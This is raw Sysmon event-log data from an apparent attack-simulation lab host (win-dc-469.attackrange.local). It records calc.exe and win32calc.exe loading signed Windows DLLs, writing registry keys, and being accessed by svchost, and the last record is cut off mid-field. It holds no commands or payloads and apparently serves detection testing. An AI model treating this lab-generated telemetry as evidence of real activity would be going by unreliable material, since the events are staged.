12241200x800000000000000057349445Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.416{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349444Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.416{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349443Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.416{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349442Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.416{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349441Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.416{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349440Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.416{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349439Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.415{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349438Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.413{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057349437Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.404{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeC:\Windows\System32\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A82FB68F785E73141F5ABC91850595A8,SHA256=416DE0DA209CDCBE9B5D1A868CE972F8FE3399FF62E84EFD46D6FD49BDF7B7B2trueMicrosoft WindowsValid 12241200x800000000000000057349436Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.404{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057349435Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.404{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeC:\Windows\System32\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A82FB68F785E73141F5ABC91850595A8,SHA256=416DE0DA209CDCBE9B5D1A868CE972F8FE3399FF62E84EFD46D6FD49BDF7B7B2trueMicrosoft WindowsValid 12241200x800000000000000057349434Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.403{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 13241300x800000000000000057349433Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:52.403{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Calc\Window_PlacementBinary Data 12241200x800000000000000057349432Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.403{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Calc 12241200x800000000000000057349431Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.403{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Calc 12241200x800000000000000057349430Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.403{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Calc 13241300x800000000000000057349429Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:52.402{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Calc\Window_PlacementBinary Data 12241200x800000000000000057349428Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.402{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Calc 12241200x800000000000000057349427Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.402{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Calc 12241200x800000000000000057349426Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.402{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Calc 12241200x800000000000000057349425Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.402{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057349424Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.402{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057349423Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.402{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057349422Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.402{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057349421Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.402{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057349420Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.402{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349419Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.402{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349418Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.401{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 734700x800000000000000057349417Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.236{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\ieframe.dll11.00.14393.4583 (rs1_release.210730-1850)Internet BrowserInternet ExplorerMicrosoft CorporationIEFRAME.DLLMD5=56C38F74FA41BC105130187415730AC8,SHA256=2815F9F6EB94A2878785B9B4694E08AF4084508D290EF90CF41E6F17A4C993E4trueMicrosoft WindowsValid 12241200x800000000000000057349416Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.401{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349415Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.401{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349414Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.401{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349413Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.401{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349412Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.401{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349411Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.401{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349410Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.401{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349409Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.401{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349408Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.401{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349407Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.401{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349406Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.401{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349405Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.401{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349404Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.401{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349403Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.401{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349402Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.401{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349401Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.396{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057349400Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.341{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Calc 12241200x800000000000000057349399Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.338{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Calc 12241200x800000000000000057349398Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.338{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Calc 12241200x800000000000000057349397Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.335{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Calc 734700x800000000000000057349396Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.333{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeC:\Windows\System32\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=74621C6ABE4E9A568DF0A38E7282D71E,SHA256=0788A092D47800D0EB120A7DBB9E59234D0722A4A2E80ECE6CE70E3A84A3750AtrueMicrosoft WindowsValid 734700x800000000000000057349395Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.331{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeC:\Windows\System32\msctf.dll10.0.14393.4530 (rs1_release.210705-0736)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=E2374A214A9F0C8347C29EBDE3447986,SHA256=F2260FE7E0C4E92D49CF0F550E2A1B3D3F1D2D76E6F5C8F16B0E16B6117D9EE1trueMicrosoft WindowsValid 734700x800000000000000057349394Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.331{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeC:\Windows\System32\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=74621C6ABE4E9A568DF0A38E7282D71E,SHA256=0788A092D47800D0EB120A7DBB9E59234D0722A4A2E80ECE6CE70E3A84A3750AtrueMicrosoft WindowsValid 734700x800000000000000057349393Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.328{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeC:\Windows\System32\msctf.dll10.0.14393.4530 (rs1_release.210705-0736)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=E2374A214A9F0C8347C29EBDE3447986,SHA256=F2260FE7E0C4E92D49CF0F550E2A1B3D3F1D2D76E6F5C8F16B0E16B6117D9EE1trueMicrosoft WindowsValid 10341000x800000000000000057349392Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.317{8B6011A9-886E-6164-1600-00000000F101}13169500C:\Windows\System32\svchost.exe{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057349391Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.317{8B6011A9-886E-6164-1600-00000000F101}13161348C:\Windows\System32\svchost.exe{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057349390Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.315{8B6011A9-886E-6164-1600-00000000F101}13169500C:\Windows\System32\svchost.exe{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057349389Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.315{8B6011A9-886E-6164-1600-00000000F101}13161348C:\Windows\System32\svchost.exe{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057349388Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.309{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeC:\Windows\System32\WindowsCodecs.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft Windows Codecs LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationWindowsCodecsMD5=B791899A46FD151559658F4F86C3C6F5,SHA256=E559B36A3CC2261C16916F2D49FA351DC4E21E5EC581AC43547ABA16F70CDA7EtrueMicrosoft WindowsValid 734700x800000000000000057349387Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.308{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeC:\Windows\System32\WindowsCodecs.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft Windows Codecs LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationWindowsCodecsMD5=B791899A46FD151559658F4F86C3C6F5,SHA256=E559B36A3CC2261C16916F2D49FA351DC4E21E5EC581AC43547ABA16F70CDA7EtrueMicrosoft WindowsValid 734700x800000000000000057349386Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.305{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x800000000000000057349385Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.304{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x800000000000000057349384Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.304{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeC:\Windows\WinSxS\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.14393.4530_none_aec97a71ddd5fa56\GdiPlus.dll10.0.14393.4530 (rs1_release.210705-0736)Microsoft GDI+Microsoft® Windows® Operating SystemMicrosoft CorporationgdiplusMD5=D1F325FD8BA2F0AA9F853CB05DBDE6F6,SHA256=ED1FDCE716A2D5E0703DEBAE0E272BAA49C750B31773E9C0ADFCF5F9758F9350trueMicrosoft WindowsValid 734700x800000000000000057349383Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.302{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeC:\Windows\WinSxS\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.14393.4530_none_aec97a71ddd5fa56\GdiPlus.dll10.0.14393.4530 (rs1_release.210705-0736)Microsoft GDI+Microsoft® Windows® Operating SystemMicrosoft CorporationgdiplusMD5=D1F325FD8BA2F0AA9F853CB05DBDE6F6,SHA256=ED1FDCE716A2D5E0703DEBAE0E272BAA49C750B31773E9C0ADFCF5F9758F9350trueMicrosoft WindowsValid 734700x800000000000000057349382Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.284{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeC:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=FD486B6FA360ABE43E02E85F3164E9BE,SHA256=733922A216EC03FC6AA405205CD2F8BB81A39180F26839588B97F310E21071B5trueMicrosoft WindowsValid 734700x800000000000000057349381Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.284{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeC:\Windows\System32\winmm.dll10.0.14393.0 (rs1_release.160715-1616)MCI API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWINMM.DLLMD5=F16410F5D557337B05CF4F93691EC106,SHA256=2B5BC3C0A6514356C6719298FC25D8D192A2C973EE3283EF48379D2745C9BD87trueMicrosoft WindowsValid 734700x800000000000000057349380Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.284{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeC:\Windows\System32\winmm.dll10.0.14393.0 (rs1_release.160715-1616)MCI API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWINMM.DLLMD5=F16410F5D557337B05CF4F93691EC106,SHA256=2B5BC3C0A6514356C6719298FC25D8D192A2C973EE3283EF48379D2745C9BD87trueMicrosoft WindowsValid 734700x800000000000000057349379Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.283{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeC:\Windows\System32\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=43AEE61AFABE70BFC876CC53D6A64E04,SHA256=8A4C893AEB075D3D9EFEC52E49CEF94471EB9F0A91BEB4C07DF38F8A48910C12trueMicrosoft WindowsValid 734700x800000000000000057349378Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.283{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057349377Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.283{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057349376Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.282{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057349375Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.282{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeC:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=FD486B6FA360ABE43E02E85F3164E9BE,SHA256=733922A216EC03FC6AA405205CD2F8BB81A39180F26839588B97F310E21071B5trueMicrosoft WindowsValid 734700x800000000000000057349374Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.282{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValid 734700x800000000000000057349373Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.281{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeC:\Windows\System32\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft 